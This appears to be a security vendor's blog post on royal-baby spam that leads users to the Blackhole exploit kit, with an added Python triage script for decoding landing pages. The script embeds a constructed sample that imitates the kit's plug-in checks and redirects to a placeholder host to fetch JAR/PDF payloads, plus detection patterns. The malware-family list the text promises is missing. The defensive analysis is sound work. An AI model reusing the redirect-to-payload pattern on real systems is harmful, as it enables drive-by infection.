The Dangers of a Royal Baby: Scams Abound

Big news stories are always an opportunity for scammers and spammers, who attempt to redirect users to malicious exploit kits or other unwanted services. Britain’s royal baby is the latest news to offer cover for malware. We have already found a lot of spam messages regarding the birth and baby that lead users to the infamous Blackhole exploit kit.

The initial infection arrives as spam mail (see Figure 1) that contains a redirection URL in the following format:

  • hxxp://[infectedDomain]/[Random]/index.html

Figure 1: Spam email.

From there the user lands on a page with links to JavaScript files, as in the next image:

Figure 2: Spam URL.

The first level contains the three *.js URLs that point to other infected/malicious domains. Once victims land on this page, the JavaScript files lead them to a page like the following:

Figure 3: Blackhole landing page redirector.

The second-level URL shows us the actual landing page of the Blackhole exploit kit, which leads us to this content:

Figure 4: Customized encoded Blackhole landing page.

We have decoded the customized base64-encoded Blackhole landing page, which yielded the “plug-in detect” JavaScript code. Blackhole uses this code to identify which plug-ins are installed on the machine, so it can select the payload that matches the specific plug-in versions available in the user’s browser. The next image shows us the decoded PluginDetect.js:

Figure 5: Decoded Blackhole landing page (PluginDetect.js with malicious URL).
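To illustrate the decoding step described above, here is a small triage script added to this post (it is not McAfee's code and not the kit's): it base64-decodes long blobs found in a captured landing page, then checks the decoded layer for the plug-in fingerprinting calls and embedded URLs that PluginDetect.js exposes. The sample page, the eval(atob(...)) wrapper and the bracketed domain/path are constructed placeholders, not indicators from the campaign.

```python
import base64
import re

# Constructed sample: a landing page whose script is a base64 blob passed to eval(atob()).
# The inner script imitates the plug-in checks seen in the decoded PluginDetect.js;
# the bracketed domain and paths are placeholders, not real indicators.
INNER_SCRIPT = (
    'var pdfver = PluginDetect.getVersion("AdobeReader");'
    'var javaver = PluginDetect.getVersion("Java");'
    'if (javaver) { location.href = "http://[placeholder-domain]/[random]/jar.jnlp"; }'
    'if (pdfver) { location.href = "http://[placeholder-domain]/[random]/pdf.php"; }'
)
SAMPLE_HTML = (
    "<html><body><script>eval(atob('"
    + base64.b64encode(INNER_SCRIPT.encode()).decode()
    + "'));</script></body></html>"
)

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")      # long base64-looking runs
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")        # URLs inside decoded script
PLUGIN_MARKERS = ("PluginDetect", "getVersion", "AdobeReader", "Java", "Flash")


def decode_blobs(html: str) -> list:
    """Base64-decode every long blob in the page, keeping only those that decode to text."""
    decoded = []
    for m in B64_BLOB.finditer(html):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary content: skip
        decoded.append(text)
    return decoded


def triage(html: str) -> dict:
    """Report plug-in fingerprinting markers and URLs found in the decoded layer(s)."""
    hits, urls = set(), []
    for text in decode_blobs(html):
        hits.update(mk for mk in PLUGIN_MARKERS if mk in text)
        urls.extend(URL_RE.findall(text))
    # A decoded script that both probes plug-ins and carries URLs is worth an analyst's look.
    return {"plugin_markers": sorted(hits), "urls": urls, "suspicious": bool(hits and urls)}


if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
```

Real landing pages often layer several encodings, so the decoded text may need to be fed back through decode_blobs before the markers appear.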

The following browser plug-ins are known to be targeted by the exploit kit:

  • Java Runtime Environment
  • Adobe PDF Reader
  • Flash

McAfee coverage for the PluginDetect.js zero-day threat is JS/Exploit!JNLP.d.

The following images show the PDF and Java exploits retrieving the malicious URL found in PluginDetect.js:

Figure 6: JAR file downloading the URL in PluginDetect.js.

Figure 7: PDF file downloading the URL in PluginDetect.js.

This redirection chain could leave victims infected with one of these malware families:

For more detail about the Blackhole exploit kit, please refer to the McAfee Threat Advisory Library.

Thanks to my colleague Rohan Shah for his assistance with this blog.